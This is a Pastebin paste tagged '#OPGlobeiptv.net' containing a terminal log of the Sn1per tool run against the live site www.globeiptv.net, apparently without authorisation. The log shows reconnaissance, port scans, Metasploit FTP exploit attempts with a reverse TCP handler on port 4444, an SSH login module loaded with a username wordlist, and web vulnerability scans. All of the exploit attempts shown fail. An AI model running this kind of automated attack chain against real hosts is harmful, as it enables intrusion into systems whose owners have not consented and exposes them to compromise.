Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #OPGlobeiptv.net
- ┌─[root@anonymous]─[~]
- └──╼ #cd Sn1per/
- ┌─[root@anonymous]─[~/Sn1per]
- └──╼ #git pull
- remote: Counting objects: 24, done.
- remote: Total 24 (delta 16), reused 16 (delta 16), pack-reused 8
- Unpacking objects: 100% (24/24), done.
- From https://github.com/1N3/Sn1per
- 58c25c7..d94d475 master -> origin/master
- Updating 58c25c7..d94d475
- error: Your local changes to the following files would be overwritten by merge:
- sniper
- Please commit your changes or stash them before you merge.
- Aborting
- ┌─[✗]─[root@anonymous]─[~/Sn1per]
- └──╼ #./sniper www.globeiptv.net
- ./sniper: line 34: cd: /usr/share/sniper/: No such file or directory
- ____
- _________ / _/___ ___ _____
- / ___/ __ \ / // __ \/ _ \/ ___/
- (__ ) / / // // /_/ / __/ /
- /____/_/ /_/___/ .___/\___/_/
- /_/
- + -- --=[http://crowdshield.com
- + -- --=[sn1per v1.9 by 1N3
- + -- ----------------------------=[Running Nslookup]=------------------------ -- +
- ../../../../lib/isc/unix/net.c:581: sendmsg() failed: Operation not permitted
- Server: 8.8.8.8
- Address: 8.8.8.8#53
- Non-authoritative answer:
- Name: www.globeiptv.net
- Address: 109.123.95.208
- ../../../../lib/isc/unix/net.c:581: sendmsg() failed: Operation not permitted
- www.globeiptv.net has address 109.123.95.208
- + -- ----------------------------=[Checking OS Fingerprint]=----------------- -- +
- [+] Target is www.globeiptv.net
- [+] Loading modules.
- [+] Following modules are loaded:
- [x] [1] ping:icmp_ping - ICMP echo discovery module
- [x] [2] ping:tcp_ping - TCP-based ping discovery module
- [x] [3] ping:udp_ping - UDP-based ping discovery module
- [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
- [x] [5] infogather:portscan - TCP and UDP PortScanner
- [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
- [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
- [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
- [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
- [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
- [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
- [x] [12] fingerprint:smb - SMB fingerprinting module
- [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
- [+] 13 modules registered
- [+] Initializing scan engine
- [+] Running scan engine
- [-] ping:tcp_ping module: no closed/open TCP ports known on 109.123.95.208. Module test failed
- [-] ping:udp_ping module: no closed/open UDP ports known on 109.123.95.208. Module test failed
- [-] No distance calculation. 109.123.95.208 appears to be dead or no ports known
- [+] Host: 109.123.95.208 is up (Guess probability: 50%)
- [+] Target: 109.123.95.208 is alive. Round-Trip Time: 0.92505 sec
- [+] Selected safe Round-Trip Time value is: 1.85010 sec
- [-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
- [-] fingerprint:smb need either TCP port 139 or 445 to run
- [-] fingerprint:snmp: need UDP port 161 open
- [+] Primary guess:
- [+] Host 109.123.95.208 Running OS: (Guess probability: 100%)
- [+] Other guesses:
- [+] Host 109.123.95.208 Running OS: `�B��U (Guess probability: 91%)
- [+] Host 109.123.95.208 Running OS: pF��U (Guess probability: 91%)
- [+] Host 109.123.95.208 Running OS: (Guess probability: 91%)
- [+] Host 109.123.95.208 Running OS: `�B��U (Guess probability: 91%)
- [+] Host 109.123.95.208 Running OS: `�B��U (Guess probability: 91%)
- [+] Host 109.123.95.208 Running OS: `�B��U (Guess probability: 91%)
- [+] Host 109.123.95.208 Running OS: `�B��U (Guess probability: 91%)
- [+] Host 109.123.95.208 Running OS: pF��U (Guess probability: 91%)
- [+] Host 109.123.95.208 Running OS: pF��U (Guess probability: 91%)
- [+] Cleaning up scan engine
- [+] Modules deinitialized
- [+] Execution completed.
- + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +
- Whois Server Version 2.0
- Domain names in the .com and .net domains can now be registered
- with many different competing registrars. Go to http://www.internic.net
- for detailed information.
- No match for "WWW.GLOBEIPTV.NET".
- >>> Last update of whois database: Tue, 13 Sep 2016 19:41:29 GMT <<<
- NOTICE: The expiration date displayed in this record is the date the
- registrar's sponsorship of the domain name registration in the registry is
- currently set to expire. This date does not necessarily reflect the expiration
- date of the domain name registrant's agreement with the sponsoring
- registrar. Users may consult the sponsoring registrar's Whois database to
- view the registrar's reported date of expiration for this registration.
- TERMS OF USE: You are not authorized to access or query our Whois
- database through the use of electronic processes that are high-volume and
- automated except as reasonably necessary to register domain names or
- modify existing registrations; the Data in VeriSign Global Registry
- Services' ("VeriSign") Whois database is provided by VeriSign for
- information purposes only, and to assist persons in obtaining information
- about or related to a domain name registration record. VeriSign does not
- guarantee its accuracy. By submitting a Whois query, you agree to abide
- by the following terms of use: You agree that you may use this Data only
- for lawful purposes and that under no circumstances will you use this Data
- to: (1) allow, enable, or otherwise support the transmission of mass
- unsolicited, commercial advertising or solicitations via e-mail, telephone,
- or facsimile; or (2) enable high volume, automated, electronic processes
- that apply to VeriSign (or its computer systems). The compilation,
- repackaging, dissemination or other use of this Data is expressly
- prohibited without the prior written consent of VeriSign. You agree not to
- use electronic processes that are automated and high-volume to access or
- query the Whois database except as reasonably necessary to register
- domain names or modify existing registrations. VeriSign reserves the right
- to restrict your access to the Whois database in its sole discretion to ensure
- operational stability. VeriSign may restrict or terminate your access to the
- Whois database for failure to abide by these terms of use. VeriSign
- reserves the right to modify these terms at any time.
- The Registry database contains ONLY .COM, .NET, .EDU domains and
- Registrars.
- + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +
- + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +
- ../../../../lib/isc/unix/net.c:581: sendmsg() failed: Operation not permitted
- ; <<>> DiG 9.10.3-P4-Debian <<>> -x www.globeiptv.net
- ;; global options: +cmd
- ;; Got answer:
- ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 62257
- ;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
- ;; OPT PSEUDOSECTION:
- ; EDNS: version: 0, flags:; udp: 4096
- ;; QUESTION SECTION:
- ;net.globeiptv.www.in-addr.arpa. IN PTR
- ;; AUTHORITY SECTION:
- in-addr.arpa. 3600 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2015074517 1800 900 604800 3600
- ;; Query time: 1225 msec
- ;; SERVER: 8.8.8.8#53(8.8.8.8)
- ;; WHEN: Tue Sep 13 22:41:45 EEST 2016
- ;; MSG SIZE rcvd: 127
- Smartmatch is experimental at ./dnsenum.pl line 698.
- Smartmatch is experimental at ./dnsenum.pl line 698.
- dnsenum.pl VERSION:1.2.4
- ----- www.globeiptv.net -----
- Host's addresses:
- __________________
- www.globeiptv.net. 86337 IN A 109.123.95.208
- Name Servers:
- ______________
- www.globeiptv.net NS record query failed: NOERROR
- + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +
- ____ _ _ _ _ _____
- / ___| _ _| |__ | (_)___| |_|___ / _ __
- \___ \| | | | '_ \| | / __| __| |_ \| '__|
- ___) | |_| | |_) | | \__ \ |_ ___) | |
- |____/ \__,_|_.__/|_|_|___/\__|____/|_|
- # Coded By Ahmed Aboul-Ela - @aboul3la
- [-] Enumerating subdomains now for www.globeiptv.net
- [-] verbosity is enabled, will show the subdomains results in realtime
- [-] Searching now in Baidu..
- [-] Searching now in Yahoo..
- [-] Searching now in Google..
- [-] Searching now in Bing..
- [-] Searching now in Ask..
- [-] Searching now in Netcraft..
- [-] Searching now in DNSdumpster..
- [-] Searching now in Virustotal..
- [-] Searching now in ThreatCrowd..
- [-] Searching now in SSL Certificates..
- [-] Searching now in PassiveDNS..
- HTTPSConnectionPool(host='dnsdumpster.com', port=443): Read timed out. (read timeout=25)
- + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +
- cat: loot/domains/domains-www.globeiptv.net.txt: No such file or directory
- + -- ----------------------------=[Checking Email Security]=----------------- -- +
- + -- ----------------------------=[Pinging host]=---------------------------- -- +
- PING www.globeiptv.net (109.123.95.208) 56(84) bytes of data.
- 64 bytes from 109.123.95.208 (109.123.95.208): icmp_seq=1 ttl=56 time=1077 ms
- --- www.globeiptv.net ping statistics ---
- 1 packets transmitted, 1 received, 0% packet loss, time 0ms
- rtt min/avg/max/mdev = 1077.105/1077.105/1077.105/0.000 ms
- + -- ----------------------------=[Running TCP port scan]=------------------- -- +
- Starting Nmap 7.12SVN ( https://nmap.org ) at 2016-09-13 22:42 EEST
- Nmap scan report for www.globeiptv.net (109.123.95.208)
- Host is up (1.1s latency).
- Not shown: 33 filtered ports, 2 closed ports
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 110/tcp open pop3
- 443/tcp open https
- Nmap done: 1 IP address (1 host up) scanned in 5.25 seconds
- + -- ----------------------------=[Running UDP port scan]=------------------- -- +
- Starting Nmap 7.12SVN ( https://nmap.org ) at 2016-09-13 22:42 EEST
- Nmap scan report for www.globeiptv.net (109.123.95.208)
- Host is up (1.1s latency).
- Not shown: 2 filtered ports
- PORT STATE SERVICE
- 53/udp open|filtered domain
- 67/udp open|filtered dhcps
- 68/udp open|filtered dhcpc
- 88/udp open|filtered kerberos-sec
- 137/udp open|filtered netbios-ns
- 139/udp open|filtered netbios-ssn
- 162/udp open|filtered snmptrap
- 389/udp open|filtered ldap
- 520/udp open|filtered route
- 2049/udp open|filtered nfs
- Nmap done: 1 IP address (1 host up) scanned in 5.36 seconds
- + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +
- + -- --=[Port 21 opened... running tests...
- Starting Nmap 7.12SVN ( https://nmap.org ) at 2016-09-13 22:42 EEST
- Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
- Nmap done: 1 IP address (0 hosts up) scanned in 3.20 seconds
- ______________________________________________________________________________
- | |
- | 3Kom SuperHack II Logon |
- |______________________________________________________________________________|
- | |
- | |
- | |
- | User Name: [ security ] |
- | |
- | Password: [ ] |
- | |
- | |
- | |
- | [ OK ] |
- |______________________________________________________________________________|
- | |
- | http://metasploit.com |
- |______________________________________________________________________________|
- Taking notes in notepad? Have Metasploit Pro track & report
- your progress and findings -- learn more on http://rapid7.com/metasploit
- =[ metasploit v4.12.23-dev ]
- + -- --=[ 1577 exploits - 907 auxiliary - 272 post ]
- + -- --=[ 455 payloads - 39 encoders - 8 nops ]
- + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
- RHOST => www.globeiptv.net
- RHOSTS => www.globeiptv.net
- [-] www.globeiptv.net:21 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (www.globeiptv.net:21).
- [*] Exploit completed, but no session was created.
- [*] Started reverse TCP double handler on 10.42.0.13:4444
- [-] www.globeiptv.net:21 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (www.globeiptv.net:21).
- [*] Exploit completed, but no session was created.
- + -- --=[Port 22 opened... running tests...
- ./sniper: line 575: cd: ssh-audit: No such file or directory
- python: can't open file 'ssh-audit.py': [Errno 2] No such file or directory
- Starting Nmap 7.12SVN ( https://nmap.org ) at 2016-09-13 22:43 EEST
- Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
- Nmap done: 1 IP address (0 hosts up) scanned in 4.43 seconds
- _---------.
- .' ####### ;."
- .---,. ;@ @@`; .---,..
- ." @@@@@'.,'@@ @@@@@',.'@@@@ ".
- '-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
- `.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
- "--'.@@@ -.@ @ ,'- .'--"
- ".@' ; @ @ `. ;'
- |@@@@ @@@ @ .
- ' @@@ @@ @@ ,
- `.@@@@ @@ .
- ',@@ @ ; _____________
- ( 3 C ) /|___ / Metasploit! \
- ;@'. __*__,." \|--- \_____________/
- '(.,...."/
- Payload caught by AV? Fly under the radar with Dynamic Payloads in
- Metasploit Pro -- learn more on http://rapid7.com/metasploit
- =[ metasploit v4.12.23-dev ]
- + -- --=[ 1577 exploits - 907 auxiliary - 272 post ]
- + -- --=[ 455 payloads - 39 encoders - 8 nops ]
- + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
- USER_FILE => /root/BruteX/wordlists/simple-users.txt
- RHOSTS => www.globeiptv.net
- RHOST => www.globeiptv.net
- [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE.
- [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE.
- [*] www.globeiptv.net:22 - Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- + -- --=[Port 23 closed... skipping.
- + -- --=[Port 25 closed... skipping.
- + -- --=[Port 53 closed... skipping.
- + -- --=[Port 79 closed... skipping.
- + -- --=[Port 80 closed... skipping.
- + -- --=[Port 110 opened... running tests...
- Starting Nmap 7.12SVN ( https://nmap.org ) at 2016-09-13 22:44 EEST
- Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
- Nmap done: 1 IP address (0 hosts up) scanned in 3.20 seconds
- + -- --=[Port 111 closed... skipping.
- + -- --=[Port 135 closed... skipping.
- + -- --=[Port 139 closed... skipping.
- + -- --=[Port 161 closed... skipping.
- + -- --=[Port 162 closed... skipping.
- + -- --=[Port 389 closed... skipping.
- + -- --=[Port 443 opened... running tests...
- + -- ----------------------------=[Checking for WAF]=------------------------ -- +
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking https://www.globeiptv.net
- ERROR:root:Site https://www.globeiptv.net appears to be down
- + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
- /opt/vulnerability-analysis/whatweb/lib/target.rb:188: warning: constant Target::TimeoutError is deprecated
- https://www.globeiptv.net ERROR: Timed out execution expired
- + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +
- AVAILABLE PLUGINS
- -----------------
- PluginChromeSha1Deprecation
- PluginHSTS
- PluginCertInfo
- PluginSessionRenegotiation
- PluginHeartbleed
- PluginCompression
- PluginSessionResumption
- PluginOpenSSLCipherSuites
- CHECKING HOST(S) AVAILABILITY
- -----------------------------
- www.globeiptv.net => WARNING: Could not connect (timeout); discarding corresponding tasks.
- SCAN COMPLETED IN 5.09 S
- ------------------------
- Version: 1.11.7-static
- OpenSSL 1.0.2i-dev xx XXX xxxx
- ERROR: Could not open a connection to host www.globeiptv.net on port 443.
- ./sniper: line 805: testssl: command not found
- ./sniper: line 807: cd: MassBleed: No such file or directory
- ./sniper: line 808: ./massbleed: No such file or directory
- + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
- + -- --=[Checking if X-Content options are enabled on www.globeiptv.net...
- + -- --=[Checking if X-Frame options are enabled on www.globeiptv.net...
- + -- --=[Checking if X-XSS-Protection header is enabled on www.globeiptv.net...
- + -- --=[Checking HTTP methods on www.globeiptv.net...
- + -- --=[Checking if TRACE method is enabled on www.globeiptv.net...
- + -- --=[Checking for open proxy on www.globeiptv.net...
- + -- --=[Enumerating software on www.globeiptv.net...
- + -- --=[Checking if Strict-Transport-Security is enabled on www.globeiptv.net...
- + -- --=[Checking for Flash cross-domain policy on www.globeiptv.net...
- + -- --=[Checking for Silverlight cross-domain policy on www.globeiptv.net...
- + -- --=[Checking for HTML5 cross-origin resource sharing on www.globeiptv.net...
- + -- --=[Retrieving robots.txt on www.globeiptv.net...
- + -- --=[Retrieving sitemap.xml on www.globeiptv.net...
- + -- --=[Checking cookie attributes on www.globeiptv.net...
- + -- --=[Checking for ASP.NET Detailed Errors on www.globeiptv.net...
- + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +
- - Nikto v2.1.6
- ---------------------------------------------------------------------------
- + No web server found on www.globeiptv.net:443
- ---------------------------------------------------------------------------
- + 0 host(s) tested
- + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +
- [+] Screenshot saved to //loot/www.globeiptv.net-port443.jpg
- + -- ----------------------------=[Running Google Hacking Queries]=---------- -- +
- + -- ----------------------------=[Running InUrlBR OSINT Queries]=----------- -- +
- Could not open input file: bin/inurlbr.php
- + -- --=[Port 445 closed... skipping.
- + -- --=[Port 512 closed... skipping.
- + -- --=[Port 513 closed... skipping.
- + -- --=[Port 514 closed... skipping.
- + -- --=[Port 1433 closed... skipping.
- + -- --=[Port 2049 closed... skipping.
- + -- --=[Port 2121 closed... skipping.
- + -- --=[Port 3306 closed... skipping.
- + -- --=[Port 3310 closed... skipping.
- + -- --=[Port 3128 closed... skipping.
- + -- --=[Port 3389 closed... skipping.
- + -- --=[Port 3632 closed... skipping.
- + -- --=[Port 5432 closed... skipping.
- + -- --=[Port 5800 closed... skipping.
- + -- --=[Port 5900 closed... skipping.
- + -- --=[Port 6000 closed... skipping.
- + -- --=[Port 6667 closed... skipping.
- + -- --=[Port 8000 closed... skipping.
- + -- --=[Port 8100 closed... skipping.
- + -- --=[Port 8080 closed... skipping.
- + -- --=[Port 8180 closed... skipping.
- + -- --=[Port 8443 closed... skipping.
- + -- --=[Port 8888 closed... skipping.
- + -- --=[Port 10000 closed... skipping.
- + -- --=[Port 49152 closed... skipping.
- + -- ----------------------------=[Scanning For Common Vulnerabilities]=----- -- +
- ./sniper: line 1193: cd: yasuo: No such file or directory
- ruby: No such file or directory -- yasuo.rb (LoadError)
- + -- ----------------------------=[Skipping Brute Force]=-------------------- -- +
- ./sniper: line 1209: cd: //loot/: No such file or directory
- + -- --=[Sorting loot directory (/)
- + -- --=[Generating reports...
- + -- ----------------------------=[Done]=------------------------------------ -- +
- ┌─[root@anonymous]─[~/Sn1per]
- └──╼ #
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement